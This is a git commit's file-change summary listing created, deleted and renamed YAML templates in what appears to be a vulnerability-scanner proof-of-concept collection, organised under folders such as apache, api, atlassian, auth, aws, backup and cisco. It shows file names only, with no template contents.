delete mode 100644 poc/apache/apache-httpd-rce-362.yaml
create mode 100644 poc/apache/apache-solr-file-read-368.yaml
delete mode 100644 poc/apache/apache-solr-file-read-369.yaml
create mode 100644 poc/apache/apache-solr-log4j-rce-372.yaml
delete mode 100644 poc/apache/default-apache-test-all.yaml
delete mode 100644 poc/apache/default-apache2-ubuntu-page.yaml
delete mode 100644 poc/api/alfacgiapi-wordpress.yaml
delete mode 100644 poc/api/apache-apisix-panel-337.yaml
create mode 100644 poc/api/apache-apisix-panel-338.yaml
create mode 100644 poc/api/api-abstractapi-383.yaml
rename poc/api/{api-abuseipdb-384.yaml => api-abuseipdb-385.yaml} (100%)
create mode 100644 poc/api/api-abuseipdb.yaml
delete mode 100644 poc/api/api-accuweather-386.yaml
create mode 100644 poc/api/api-accuweather.yaml
delete mode 100644 poc/api/api-adafruit-io-387.yaml
create mode 100644 poc/api/api-adafruit-io.yaml
delete mode 100644 poc/api/api-alienvault-388.yaml
delete mode 100644 poc/api/api-apigee-edge-391.yaml
create mode 100644 poc/api/api-apigee-edge.yaml
delete mode 100644 poc/api/api-appveyor-392.yaml
create mode 100644 poc/api/api-appveyor.yaml
create mode 100644 poc/api/api-bible-394.yaml
delete mode 100644 poc/api/api-bible.yaml
delete mode 100644 poc/api/api-bingmaps.yaml
create mode 100644 poc/api/api-bitrise-397.yaml
delete mode 100644 poc/api/api-bitrise.yaml
delete mode 100644 poc/api/api-block-400.yaml
create mode 100644 poc/api/api-block.yaml
delete mode 100644 poc/api/api-blockchain.yaml
delete mode 100644 poc/api/api-buildkite.yaml
delete mode 100644 poc/api/api-circleci.yaml
delete mode 100644 poc/api/api-coinapi-408.yaml
create mode 100644 poc/api/api-coinapi.yaml
delete mode 100644 poc/api/api-debounce-414.yaml
create mode 100644 poc/api/api-debounce.yaml
create mode 100644 poc/api/api-deviantart-415.yaml
delete mode 100644 poc/api/api-deviantart.yaml
rename poc/api/{api-dribbble.yaml => api-dribbble-417.yaml} (100%)
create mode 100644 poc/api/api-europeana-420.yaml
create mode 100644 poc/api/api-fastly-424.yaml
rename poc/api/{api-fastly.yml => api-fastly.yaml} (100%)
create mode 100644 poc/api/api-festivo-425.yaml
delete mode 100644 poc/api/api-festivo.yaml
delete mode 100644 poc/api/api-fullhunt-428.yaml
create mode 100644 poc/api/api-fullhunt.yaml
create mode 100644 poc/api/api-google-drive-432.yaml
delete mode 100644 poc/api/api-google-drive.yaml
delete mode 100644 poc/api/api-hirak-rates-436.yaml
create mode 100644 poc/api/api-hirak-rates.yaml
delete mode 100644 poc/api/api-hubspot.yaml
create mode 100644 poc/api/api-iconfinder-439.yaml
delete mode 100644 poc/api/api-improvmx-440.yaml
create mode 100644 poc/api/api-improvmx.yaml
delete mode 100644 poc/api/api-instatus-442.yaml
create mode 100644 poc/api/api-instatus.yaml
create mode 100644 poc/api/api-intercom-443.yaml
delete mode 100644 poc/api/api-intercom.yaml
rename poc/api/{api-ipstack.yaml => api-ipstack-444.yaml} (100%)
create mode 100644 poc/api/api-iterable-445.yaml
delete mode 100644 poc/api/api-iterable.yaml
rename poc/api/{api-jumpcloud.yaml => api-jumpcloud-446.yaml} (100%)
rename poc/api/{api-lokalise-452.yaml => api-lokalise.yaml} (100%)
delete mode 100644 poc/api/api-mailchimp-454.yaml
create mode 100644 poc/api/api-malshare.yaml
delete mode 100644 poc/api/api-malwarebazaar-458.yaml
delete mode 100644 poc/api/api-mapbox.yaml
delete mode 100644 poc/api/api-mojoauth-466.yaml
create mode 100644 poc/api/api-mojoauth.yaml
delete mode 100644 poc/api/api-mywot-468.yaml
delete mode 100644 poc/api/api-netlify-470.yaml
create mode 100644 poc/api/api-netlify.yaml
delete mode 100644 poc/api/api-openweather.yaml
rename poc/api/{api-pagerduty.yaml => api-pagerduty-475.yaml} (100%)
create mode 100644 poc/api/api-pendo.yaml
create mode 100644 poc/api/api-petfinder-480.yaml
delete mode 100644 poc/api/api-petfinder.yaml
rename poc/api/{api-pivotaltracker.yaml => api-pivotaltracker-482.yaml} (100%)
delete mode 100644 poc/api/api-postmark-483.yaml
delete mode 100644 poc/api/api-rijksmuseum.yaml
create mode 100644 poc/api/api-scanii-488.yaml
delete mode 100644 poc/api/api-sendgrid-489.yaml
rename poc/api/{api-slack-493.yaml => api-slack.yaml} (100%)
create mode 100644 poc/api/api-sonarcloud.yaml
delete mode 100644 poc/api/api-spotify-495.yaml
create mode 100644 poc/api/api-spotify.yaml
rename poc/api/{api-square-496.yaml => api-square.yaml} (100%)
delete mode 100644 poc/api/api-sslmate-497.yaml
create mode 100644 poc/api/api-sslmate.yaml
delete mode 100644 poc/api/api-stripe-499.yaml
delete mode 100644 poc/api/api-taiga-501.yaml
create mode 100644 poc/api/api-taiga.yaml
delete mode 100644 poc/api/api-thecatapi-502.yaml
delete mode 100644 poc/api/api-tink-504.yaml
create mode 100644 poc/api/api-tink.yaml
delete mode 100644 poc/api/api-travisci.yaml
delete mode 100644 poc/api/api-visualstudio-513.yaml
create mode 100644 poc/api/api-visualstudio.yaml
create mode 100644 poc/api/api-wakatime.yaml
delete mode 100644 poc/api/api-weglot-516.yaml
delete mode 100644 poc/api/api-wordcloud-517.yaml
delete mode 100644 poc/api/api-youtube-519.yaml
create mode 100644 poc/api/api-youtube.yaml
delete mode 100644 poc/api/apiman-panel-462.yaml
delete mode 100644 poc/api/bems-api-lfi-709.yaml
delete mode 100644 poc/api/bems-api-lfi-712.yaml
create mode 100644 poc/api/burp-api-detect-810.yaml
delete mode 100644 poc/api/burp-api-detect-812.yaml
create mode 100644 poc/api/fastapi-docs-7398.yaml
delete mode 100644 poc/api/gmail-api-client-secrets-7741.yaml
create mode 100644 poc/api/graylog-api-browser-7846.yaml
delete mode 100644 poc/api/graylog-api-browser.yaml
delete mode 100644 poc/api/http-etcd-unauthenticated-api-data-leak-8056.yaml
create mode 100644 poc/api/http-etcd-unauthenticated-api-data-leak.yaml
create mode 100644 poc/api/kube-api-namespaces-8505.yaml
delete mode 100644 poc/api/kube-api-nodes-8508.yaml
delete mode 100644 poc/api/kube-api-nodes.yaml
create mode 100644 poc/api/kube-api-pods.yaml
create mode 100644 poc/api/magento-2-exposed-api-8688.yaml
delete mode 100644 poc/api/mailchimp-api-key-8726.yaml
rename poc/api/{mailgun-api-11855.yaml => mailgun-api(1).yaml} (100%)
rename poc/api/{strapi-documentation-10543.yaml => strapi-documentation-10542.yaml} (100%)
rename poc/api/{strapi-page.yaml => strapi-page-10545.yaml} (100%)
create mode 100644 poc/api/stripe-api-key(1).yaml
delete mode 100644 poc/api/stripe-api-key-11869.yaml
create mode 100644 poc/api/twilio-api-10860.yaml
delete mode 100644 poc/api/twilio-api-10861.yaml
delete mode 100644 poc/api/unauth-spark-api.yaml
delete mode 100644 poc/api/wadl-api-11082.yaml
create mode 100644 poc/api/wsdl-api-11634.yaml
delete mode 100644 poc/api/wso2-apimanager-detect-11638.yaml
create mode 100644 poc/api/yapi-rce-11725.yaml
create mode 100644 poc/atlassian/atlassian-bamboo-panel.yaml
delete mode 100644 poc/atlassian/atlassian-crowd-panel-583.yaml
create mode 100644 poc/atlassian/bitbucket-takeover-738.yaml
delete mode 100644 poc/atlassian/bitbucket-takeover-740.yaml
delete mode 100644 poc/atlassian/confluence-detect-1187.yaml
create mode 100644 poc/atlassian/confluence-detect-1189.yaml
create mode 100644 poc/atlassian/confluence-ssrf-sharelinks-1192.yaml
delete mode 100644 poc/atlassian/confluence-ssrf-sharelinks-1193.yaml
create mode 100644 poc/atlassian/jira-detect-8313.yaml
delete mode 100644 poc/atlassian/jira-detect-8314.yaml
create mode 100644 poc/atlassian/jira-unauthenticated-installed-gadgets-8330.yaml
delete mode 100644 poc/atlassian/jira-unauthenticated-popular-filters-8331.yaml
rename poc/atlassian/{jira-unauthenticated-projectcategories-8332.yaml => jira-unauthenticated-projectcategories.yaml} (100%)
create mode 100644 poc/atlassian/jira_user_piker (copy 1).yaml
delete mode 100644 poc/auth/Dynatrace-token (copy 1).yaml
create mode 100644 poc/auth/Mantis-Default_login.yaml
delete mode 100644 poc/auth/Redmine-Default-Login.yaml
rename poc/auth/{acemanager-login-23.yaml => acemanager-login-24.yaml} (100%)
delete mode 100644 poc/auth/activemq-default-login-44.yaml
create mode 100644 poc/auth/activemq-default-login-48.yaml
create mode 100644 poc/auth/adobe-component-login-89.yaml
delete mode 100644 poc/auth/adobe-component-login-90.yaml
create mode 100644 poc/auth/adobe-component-login-91.yaml
rename poc/auth/{adobe-connect-central-login-93.yaml => adobe-connect-central-login-96.yaml} (100%)
delete mode 100644 poc/auth/adobe-experience-manager-login-105.yaml
create mode 100644 poc/auth/adobe-experience-manager-login-106.yaml
delete mode 100644 poc/auth/aem-default-login-140.yaml
rename poc/auth/{aem-login-status-169.yaml => aem-login-status-167.yaml} (100%)
create mode 100644 poc/auth/aem-secrets.yaml
rename poc/auth/{aims-password-mgmt-client-218.yaml => aims-password-mgmt-client-219.yaml} (100%)
create mode 100644 poc/auth/aims-password-mgmt-client-221.yaml
create mode 100644 poc/auth/aims-password-portal-225.yaml
create mode 100644 poc/auth/alibaba-mongoshake-unauth-268.yaml
delete mode 100644 poc/auth/alphaweb-default-login.yaml
delete mode 100644 poc/auth/ambari-default-login-287.yaml
create mode 100644 poc/auth/ambari-default-login-289.yaml
delete mode 100644 poc/auth/ametys-admin-login-301.yaml
create mode 100644 poc/auth/ametys-admin-login-302.yaml
delete mode 100644 poc/auth/apache-flink-unauth-rce-355.yaml
delete mode 100644 poc/auth/apc-ups-login.yaml
delete mode 100644 poc/auth/api-mojoauth-466.yaml
create mode 100644 poc/auth/api-mojoauth.yaml
rename poc/auth/{apollo-default-login-521.yaml => apollo-default-login.yaml} (100%)
delete mode 100644 poc/auth/argocd-login-534.yaml
rename poc/auth/{argocd-login.yaml => argocd-login-536.yaml} (100%)
delete mode 100644 poc/auth/arl-default-login-537.yaml
delete mode 100644 poc/auth/atvise-login.yaml
create mode 100644 poc/auth/authelia-panel.yaml
delete mode 100644 poc/auth/avatier-password-management-605.yaml
rename poc/auth/{avatier-password-management.yaml => avatier_password_management.yaml} (100%)
create mode 100644 poc/auth/aws-access-key-value-624.yaml
create mode 100644 poc/auth/aws-opensearch-login-649.yaml
delete mode 100644 poc/auth/aws-opensearch-login-650.yaml
rename poc/auth/{axiom-digitalocean-key-exposure-667.yaml => axiom-digitalocean-key-exposure.yaml} (100%)
rename poc/auth/{azkaban-default-login-673.yaml => azkaban-default-login.yaml} (100%)
rename poc/auth/{basic-auth-detection-687.yaml => basic-auth-detection-689.yaml} (100%)
create mode 100644 poc/auth/bazarr-login-702.yaml
rename poc/auth/{bigbluebutton-login-726.yaml => bigbluebutton-login-724.yaml} (100%)
delete mode 100644 poc/auth/blue-iris-login-751.yaml
create mode 100644 poc/auth/blue-iris-login-754.yaml
delete mode 100644 poc/auth/braintree-access-token.yaml
rename poc/auth/{brother-unauthorized-access-792.yaml => brother-unauthorized-access-793.yaml} (100%)
create mode 100644 poc/auth/canal-default-login-846.yaml
delete mode 100644 poc/auth/canal-default-login-849.yaml
delete mode 100644 poc/auth/chinaunicom-default-login-906.yaml
delete mode 100644 poc/auth/cisco-finesse-login-938.yaml
create mode 100644 poc/auth/cisco-finesse-login-940.yaml
create mode 100644 poc/auth/cisco-systems-login-973.yaml
delete mode 100644 poc/auth/cisco-systems-login-975.yaml
rename poc/auth/{cisco-ucs-kvm-login-980.yaml => cisco-ucs-kvm-login-979.yaml} (100%)
create mode 100644 poc/auth/clickhouse-unauth-1002.yaml
delete mode 100644 poc/auth/clickhouse-unauth-1003.yaml
rename poc/auth/{cobbler-default-login-1119.yaml => cobbler-default-login-1118.yaml} (100%)
delete mode 100644 poc/auth/cobbler-default-login.yaml
delete mode 100644 poc/auth/codian-mcu-login-1139.yaml
create mode 100644 poc/auth/commax-credentials-disclosure-1160.yaml
create mode 100644 poc/auth/credentials-1257.yaml
delete mode 100644 poc/auth/credentials-1258.yaml
create mode 100644 poc/auth/credentials-disclosure-1256.yaml
create mode 100644 poc/auth/crush-ftp-login-1275.yaml
create mode 100644 poc/auth/crushftp-default-login.yaml
create mode 100644 poc/auth/cs-cart-unauthenticated-lfi-1284.yaml
rename poc/auth/{cs-cart-unauthenticated-lfi-1285.yaml => cs-cart-unauthenticated-lfi.yaml} (100%)
delete mode 100644 poc/auth/dbeaver-credentials-6780.yaml
rename poc/auth/{dell-idrac-default-login-6943.yaml => dell-idrac-default-login.yaml} (100%)
delete mode 100644 poc/auth/dell-openmanager-login-6949.yaml
delete mode 100644 poc/auth/dell-openmanager-login-6951.yaml
create mode 100644 poc/auth/directadmin-login-panel-7000.yaml
delete mode 100644 poc/auth/django-secret-key.yaml
create mode 100644 poc/auth/django-secret.key.yaml
create mode 100644 poc/auth/dolphinscheduler-default-login-7073.yaml
rename poc/auth/{dubbo-admin-default-login.yaml => dubbo-admin-default-login-7120.yaml} (100%)
rename poc/auth/{dvwa-default-login-7127.yaml => dvwa-default-login.yaml} (100%)
delete mode 100644 poc/auth/dvwa-headless-automatic-login-7130.yaml
create mode 100644 poc/auth/dvwa-headless-automatic-login-7131.yaml
create mode 100644 poc/auth/dynatrace-token-7145.yaml
delete mode 100644 poc/auth/dynatrace-token-7146.yaml
delete mode 100644 poc/auth/emcecom-default-login-7211.yaml
create mode 100644 poc/auth/emqx-default-login-7222.yaml
delete mode 100644 poc/auth/ems-login-panel-7223.yaml
delete mode 100644 poc/auth/epmp-login.yaml
delete mode 100644 poc/auth/etcd-keys-7261.yaml
delete mode 100644 poc/auth/etcd-keys-7262.yaml
rename poc/auth/{exacqvision-default-login-7277.yaml => exacqvision-default-login.yaml} (100%)
delete mode 100644 poc/auth/faraday-login-7395.yaml
delete mode 100644 poc/auth/faraday-login-7397.yaml
create mode 100644 poc/auth/fatpipe-auth-bypass-7431.yaml
delete mode 100644 poc/auth/fatpipe-auth-bypass.yaml
delete mode 100644 poc/auth/flir-default-login-7514.yaml
create mode 100644 poc/auth/flir-default-login.yaml
delete mode 100644 poc/auth/frp-default-login-7556.yaml
delete mode 100644 poc/auth/ftp-credentials-exposure-7568.yaml
create mode 100644 poc/auth/ftp-credentials-exposure.yaml
delete mode 100644 poc/auth/ftp-weak-credentials-7570.yaml
create mode 100644 poc/auth/git-credentials-disclosure-7641.yaml
rename poc/auth/{git-credentials-disclosure-7640.yaml => git-credentials-disclosure.yaml} (100%)
delete mode 100644 poc/auth/gitlab-public-signup-7683.yaml
delete mode 100644 poc/auth/gitlab-weak-login.yaml
delete mode 100644 poc/auth/glpi-authentication-7730.yaml
create mode 100644 poc/auth/glpi-default-login.yaml
delete mode 100644 poc/auth/gmail-api-client-secrets-7741.yaml
create mode 100644 poc/auth/google-earth-dlogin-7781.yaml
rename poc/auth/{facebook-secrets.yaml => google-secrets.yaml} (100%)
delete mode 100644 poc/auth/gophish-login-7795.yaml
create mode 100644 poc/auth/gophish-login-7796.yaml
create mode 100644 poc/auth/grafana-public-signup-7814.yaml
create mode 100644 poc/auth/guacamole-default-login-7859.yaml
create mode 100644 poc/auth/hongdian-default-login-7997.yaml
delete mode 100644 poc/auth/hongdian-default-login-7999.yaml
delete mode 100644 poc/auth/hp-ilo-serial-key-disclosure-8023.yaml
create mode 100644 poc/auth/hp-ilo-serial-key-disclosure-8025.yaml
create mode 100644 poc/auth/hpe-system-management-login-8017.yaml
create mode 100644 poc/auth/htpasswd-detection-8046.yaml
delete mode 100644 poc/auth/http-etcd-unauthenticated-api-data-leak-8056.yaml
create mode 100644 poc/auth/http-etcd-unauthenticated-api-data-leak.yaml
delete mode 100644 poc/auth/huawei-HG532e-default-router-login.yaml
create mode 100644 poc/auth/huawei-router-auth-bypass-8076.yaml
delete mode 100644 poc/auth/hue-default-credential-8081.yaml
delete mode 100644 poc/auth/hue-default-credential.yaml
rename poc/auth/{ibm-note-login-8110.yaml => ibm-note-login-8112.yaml} (100%)
create mode 100644 poc/auth/icinga-web-login-8134.yaml
delete mode 100644 poc/auth/icinga-web-login-8137.yaml
delete mode 100644 poc/auth/idemia-biometrics-default-login-8139.yaml
rename poc/auth/{idemia-biometrics-default-login.yaml => idemia-biometrics-default-login-8141.yaml} (100%)
delete mode 100644 poc/auth/iptime-default-login-8193.yaml
delete mode 100644 poc/auth/jellyseerr-login-panel.yaml
delete mode 100644 poc/auth/jenkins-login-8277.yaml
create mode 100644 poc/auth/jenkins-login-8280.yaml
create mode 100644 poc/auth/jfrog-unauth-build-exposed-8299.yaml
create mode 100644 poc/auth/jinher-oa-default-login-8312.yaml
create mode 100644 poc/auth/jira-unauthenticated-installed-gadgets-8330.yaml
delete mode 100644 poc/auth/jira-unauthenticated-popular-filters-8331.yaml
rename poc/auth/{jira-unauthenticated-projectcategories-8332.yaml => jira-unauthenticated-projectcategories.yaml} (100%)
delete mode 100644 poc/auth/jmx-default-login-8355.yaml
create mode 100644 poc/auth/jmx-default-login.yaml
create mode 100644 poc/auth/jolokia-unauthenticated-lfi-8366.yaml
rename poc/auth/{jolokia-unauthenticated-lfi-8364.yaml => jolokia-unauthenticated-lfi.yaml} (100%)
delete mode 100644 poc/auth/jupyter-ipython-unauth-8402.yaml
delete mode 100644 poc/auth/jupyterhub-default-login-8400.yaml
rename poc/auth/{jwt-token-8410.yaml => jwt-token.yaml} (100%)
create mode 100644 poc/auth/kafka-center-default-login.yaml
create mode 100644 poc/auth/kasm-login-panel.yaml
create mode 100644 poc/auth/keenetic-web-login-8442.yaml
delete mode 100644 poc/auth/keenetic-web-login-8443.yaml
delete mode 100644 poc/auth/kentico-login-8446.yaml
rename poc/auth/{keycloak-json-8472.yaml => keycloak-json-8473.yaml} (100%)
delete mode 100644 poc/auth/keycloak-openid-config-8475.yaml
create mode 100644 poc/auth/keycloak-openid-config.yaml
rename poc/auth/{kubernetes-unauth.yaml => kubernetes-unauth(1).yaml} (100%)
delete mode 100644 poc/auth/lucee-login-8665.yaml
create mode 100644 poc/auth/lutron-iot-default-login-8675.yaml
delete mode 100644 poc/auth/lutron-iot-default-login-8678.yaml
delete mode 100644 poc/auth/mailchimp-api-key-8726.yaml
delete mode 100644 poc/auth/meshcentral-login-8801.yaml
create mode 100644 poc/auth/meshcentral-login-8803.yaml
delete mode 100644 poc/auth/mongodb-unauth-8925.yaml
create mode 100644 poc/auth/nagios-default-login-8990.yaml
delete mode 100644 poc/auth/nagios-default-login-8994.yaml
delete mode 100644 poc/auth/netgear-router-auth-bypass-9025.yaml
create mode 100644 poc/auth/netgear-router-auth-bypass.yaml
delete mode 100644 poc/auth/netsus-default-login-9060.yaml
create mode 100644 poc/auth/netsus-default-login.yaml
create mode 100644 poc/auth/netsus-server-login-9061.yaml
delete mode 100644 poc/auth/netsus-server-login-9062.yaml
delete mode 100644 poc/auth/nps-default-login-9145.yaml
create mode 100644 poc/auth/nuuno-network-login-9164.yaml
rename poc/auth/{nuuno-network-login-9162.yaml => nuuno-network-login.yaml} (100%)
create mode 100644 poc/auth/oauth-access-key-9186.yaml
delete mode 100644 poc/auth/oauth2-detect-9181.yaml
delete mode 100644 poc/auth/octobercms-default-login-9192.yaml
create mode 100644 poc/auth/octobercms-default-login.yaml
delete mode 100644 poc/auth/ofbiz-default-login-9210.yaml
create mode 100644 poc/auth/open-stack-dashboard-login-9321.yaml
delete mode 100644 poc/auth/open-stack-dashboard-login-9322.yaml
delete mode 100644 poc/auth/openemr-default-login.yaml
create mode 100644 poc/auth/oracle-opera-login.yaml
create mode 100644 poc/auth/panabit-ixcache-default-login.yaml
create mode 100644 poc/auth/panos-default-login-9455.yaml
create mode 100644 poc/auth/panos-default-login.yaml
create mode 100644 poc/auth/paypal-braintree-token(1).yaml
delete mode 100644 poc/auth/paypal-braintree-token-11856.yaml
delete mode 100644 poc/auth/pentaho-default-login-9478.yaml
create mode 100644 poc/auth/pentaho-default-login-9480.yaml
delete mode 100644 poc/auth/pinpoint-unauth-9590.yaml
delete mode 100644 poc/auth/polycom-login-9625.yaml
create mode 100644 poc/auth/polycom-login-9627.yaml
delete mode 100644 poc/auth/possible-AEM-secrets.yaml
rename poc/auth/{putty-private-key-disclosure-9732.yaml => putty-private-key-disclosure-9730.yaml} (100%)
delete mode 100644 poc/auth/rails-secret-token-disclosure-9809.yaml
create mode 100644 poc/auth/rails-secret-token-disclosure-9810.yaml
create mode 100644 poc/auth/rainloop-default-login.yaml
create mode 100644 poc/auth/ranger-default-login-9827.yaml
create mode 100644 poc/auth/rockmongo-default-login-9897.yaml
rename poc/auth/{routeros-login-9908.yaml => routeros-login-9909.yaml} (100%)
delete mode 100644 poc/auth/routeros-login.yaml
delete mode 100644 poc/auth/ruijie-eg-password-leak-9922.yaml
delete mode 100644 poc/auth/saferoads-vms-login-9971.yaml
create mode 100644 poc/auth/saferoads-vms-login-9973.yaml
create mode 100644 poc/auth/samsung-wlan-default-login-10018.yaml
delete mode 100644 poc/auth/sangfor-edr-auth-bypass.yaml
rename poc/auth/{sauter-login-10089.yaml => sauter-login-10091.yaml} (100%)
delete mode 100644 poc/auth/seats-login-10104.yaml
create mode 100644 poc/auth/server-backup-login-10153.yaml
delete mode 100644 poc/auth/server-backup-login-10156.yaml
rename poc/auth/{service-pwd.yaml => service-pwd-10176.yaml} (100%)
delete mode 100644 poc/auth/servicedesk-login-panel-10172.yaml
create mode 100644 poc/auth/shopify-custom-token(1).yaml
delete mode 100644 poc/auth/shopify-custom-token-10198.yaml
delete mode 100644 poc/auth/shopify-private-token-11861.yaml
create mode 100644 poc/auth/shoppable-token-10209.yaml
create mode 100644 poc/auth/shoppable-token.yaml
rename poc/auth/{sitefinity-login-10298.yaml => sitefinity-login-10297.yaml} (100%)
delete mode 100644 poc/auth/siteomat-login-10300.yaml
create mode 100644 poc/auth/siteomat-login-10301.yaml
create mode 100644 poc/auth/slack-bot-token-10312.yaml
delete mode 100644 poc/auth/solar-log-authbypass-10352.yaml
create mode 100644 poc/auth/solar-log-authbypass.yaml
delete mode 100644 poc/auth/solarwinds-default-login-10355.yaml
create mode 100644 poc/auth/somfy-login-10371.yaml
delete mode 100644 poc/auth/somfy-login-10373.yaml
delete mode 100644 poc/auth/sonarqube-token-10380.yaml
create mode 100644 poc/auth/spark-webui-unauth-10401.yaml
delete mode 100644 poc/auth/sphider-login-10407.yaml
create mode 100644 poc/auth/sphider-login-10409.yaml
delete mode 100644 poc/auth/splunk-enterprise-login-panel.yml
create mode 100644 poc/auth/splunk-login-10416.yaml
delete mode 100644 poc/auth/square-access-token(1).yaml
create mode 100644 poc/auth/square-access-token-11867.yaml
create mode 100644 poc/auth/stem-audio-table-private-keys-10535.yaml
delete mode 100644 poc/auth/stem-audio-table-private-keys-10536.yaml
create mode 100644 poc/auth/stripe-api-key(1).yaml
delete mode 100644 poc/auth/stripe-api-key-11869.yaml
create mode 100644 poc/auth/stripe-restricted-key.yaml
delete mode 100644 poc/auth/submitty-login-10568.yaml
create mode 100644 poc/auth/supermicro-default-login.yaml
delete mode 100644 poc/auth/symantec-dlp-login-10596.yaml
rename poc/auth/{symantec-epm-login-10601.yaml => symantec-epm-login-10599.yaml} (100%)
rename poc/auth/{szhe-default-login.yaml => szhe-default-login-10638.yaml} (100%)
create mode 100644 poc/auth/telecom-gateway-default-login.yaml
create mode 100644 poc/auth/tidb-unauth-10770.yaml
delete mode 100644 poc/auth/tidb-unauth-10772.yaml
create mode 100644 poc/auth/tomcat-default-login.yaml
create mode 100644 poc/auth/ucmdb-default-login-10871.yaml
rename poc/auth/{ucmdb-default-login-10869.yaml => ucmdb-default-login.yaml} (100%)
delete mode 100644 poc/auth/unauth-ftp-10942.yaml
delete mode 100644 poc/auth/unauth-hoteldruid-panel-10943.yaml
create mode 100644 poc/auth/unauth-hoteldruid-panel.yaml
delete mode 100644 poc/auth/unauth-spark-api.yaml
create mode 100644 poc/auth/unauth-wavink-panel-10967.yaml
delete mode 100644 poc/auth/unauth-xproxy-dashboard-10968.yaml
create mode 100644 poc/auth/unauth-xproxy-dashboard-10969.yaml
create mode 100644 poc/auth/unauthenticated-airflow-10884.yaml
delete mode 100644 poc/auth/unauthenticated-airflow-10886.yaml
delete mode 100644 poc/auth/unauthenticated-alert-manager-10892.yaml
create mode 100644 poc/auth/unauthenticated-frp-10895.yaml
delete mode 100644 poc/auth/unauthenticated-frp-10897.yaml
create mode 100644 poc/auth/unauthenticated-influxdb-10903.yaml
create mode 100644 poc/auth/unauthenticated-mongo-express.yaml
create mode 100644 poc/auth/unauthenticated-nacos-access-10912.yaml
delete mode 100644 poc/auth/unauthenticated-nacos-access-10915.yaml
create mode 100644 poc/auth/unauthenticated-popup-upload-10921.yaml
rename poc/auth/{unauthenticated-popup-upload-10922.yaml => unauthenticated-popup-upload.yaml} (100%)
delete mode 100644 poc/auth/unauthenticated-prtg-10924.yaml
create mode 100644 poc/auth/unauthenticated-prtg-10927.yaml
delete mode 100644 poc/auth/unauthenticated-zipkin.yaml
delete mode 100644 poc/auth/unauthorized-h3csecparh-login-10948.yaml
create mode 100644 poc/auth/unauthorized-h3csecparh-login.yaml
create mode 100644 poc/auth/unauthorized-hp-printer-10951.yaml
delete mode 100644 poc/auth/unauthorized-plastic-scm-10957.yaml
create mode 100644 poc/auth/unauthorized-puppet-node-manager-detect-10958.yaml
delete mode 100644 poc/auth/unauthorized-puppet-node-manager-detect-10959.yaml
delete mode 100644 poc/auth/vidyo-default-login-11009.yaml
rename poc/auth/{vidyo-default-login.yaml => vidyo-default-login-11010.yaml} (100%)
create mode 100644 poc/auth/vigor-login-11020.yaml
delete mode 100644 poc/auth/vigor-login-11023.yaml
create mode 100644 poc/auth/visionhub-default-login-11026.yaml
create mode 100644 poc/auth/vpms-auth-bypass-11066.yaml
delete mode 100644 poc/auth/vpms-auth-bypass-11068.yaml
rename poc/auth/{watchguard-credentials-disclosure-11106.yaml => watchguard-credentials-disclosure.yaml} (100%)
delete mode 100644 poc/auth/weblogic-weak-login-11154.yaml
delete mode 100644 poc/auth/wifisky-default-password-11205.yaml
delete mode 100644 poc/auth/wordpress-infinitewp-auth-bypass-11288.yaml
create mode 100644 poc/auth/wordpress-weak-credentials-11336.yaml
delete mode 100644 poc/auth/wordpress-weak-credentials-11337.yaml
create mode 100644 poc/auth/wpdm-cache-session-11436.yaml
delete mode 100644 poc/auth/wpdm-cache-session-11438.yaml
delete mode 100644 poc/auth/wso2-default-login.yaml
delete mode 100644 poc/auth/xenforo-login-11674.yaml
create mode 100644 poc/auth/xenmobile-login-11675.yaml
delete mode 100644 poc/auth/xenmobile-login-11677.yaml
create mode 100644 poc/auth/xerox7-default-login.yaml
create mode 100644 poc/auth/xvr-login-11705.yaml
delete mode 100644 poc/auth/xxljob-default-login-11709.yaml
create mode 100644 poc/auth/zabbix-server-login-11769.yaml
create mode 100644 poc/auth/zeroshell-login-11788.yaml
delete mode 100644 poc/auth/zeroshell-login-11790.yaml
create mode 100644 poc/auth/zhiyuan-oa-session-leak-11802.yaml
rename poc/auth/{zhiyuan-oa-session-leak-11801.yaml => zhiyuan-oa-session-leak.yaml} (100%)
create mode 100644 poc/auth/zhiyuan-oa-unauthorized-11806.yaml
delete mode 100644 poc/auth/zhiyuan-oa-unauthorized-11808.yaml
create mode 100644 poc/auth/zimbra-preauth-ssrf.yaml
create mode 100644 poc/auth/zms-auth-bypass-11830.yaml
delete mode 100644 poc/auth/zms-auth-bypass-11832.yaml
delete mode 100644 poc/aws/amazon-docker-config-280.yaml
delete mode 100644 poc/aws/amazon-docker-config-disclosure-278.yaml
create mode 100644 poc/aws/amazon-docker-config.yaml
delete mode 100644 poc/aws/aws-access-id-618.yaml
delete mode 100644 poc/aws/aws-access-id-620.yaml
create mode 100644 poc/aws/aws-access-key-value-624.yaml
delete mode 100644 poc/aws/aws-bucket-service-628.yaml
create mode 100644 poc/aws/aws-bucket-service.yaml
delete mode 100644 poc/aws/aws-cloudfront-service-635.yaml
delete mode 100644 poc/aws/aws-cognito-638.yaml
delete mode 100644 poc/aws/aws-ecs-container-agent-tasks-641.yaml
delete mode 100644 poc/aws/aws-elastic-beanstalk-detect.yaml
create mode 100644 poc/aws/aws-opensearch-login-649.yaml
delete mode 100644 poc/aws/aws-opensearch-login-650.yaml
create mode 100644 poc/aws/aws-redirect-651.yaml
create mode 100644 poc/aws/awstats-config-656.yaml
delete mode 100644 poc/aws/awstats-config.yaml
create mode 100644 poc/aws/awstats-script-657.yaml
delete mode 100644 poc/aws/awstats-script-658.yaml
delete mode 100644 poc/aws/ec2-detection-7162.yaml
create mode 100644 poc/aws/ec2-detection-7163.yaml
delete mode 100644 poc/aws/metadata-aws.yaml
delete mode 100644 poc/aws/s3-subtakeover-9968.yaml
create mode 100644 poc/aws/s3-subtakeover-9969.yaml
delete mode 100644 poc/backup/db-backup-lfi-6774.yaml
create mode 100644 poc/backup/db-backup-lfi-6775.yaml
rename poc/backup/{php-backup-files-9497.yaml => php-backup-files-9498.yaml} (100%)
create mode 100644 poc/backup/server-backup-login-10153.yaml
delete mode 100644 poc/backup/server-backup-login-10156.yaml
delete mode 100644 poc/backup/server-backup-manager-se-10157.yaml
create mode 100644 poc/backup/server-backup-manager-se-10160.yaml
rename poc/backup/{wordpress-total-upkeep-backup-download-11322.yaml => wordpress-total-upkeep-backup-download-11324.yaml} (100%)
delete mode 100644 poc/cisco/cisco-cloudcenter-suite-log4j-rce.yaml
create mode 100644 poc/cisco/cisco-cloudcenter-suite-rce.yaml
delete mode 100644 poc/cisco/cisco-finesse-login-938.yaml
create mode 100644 poc/cisco/cisco-finesse-login-940.yaml
create mode 100644 poc/cisco/cisco-meraki-exposure-944.yaml
delete mode 100644 poc/cisco/cisco-meraki-exposure-946.yaml
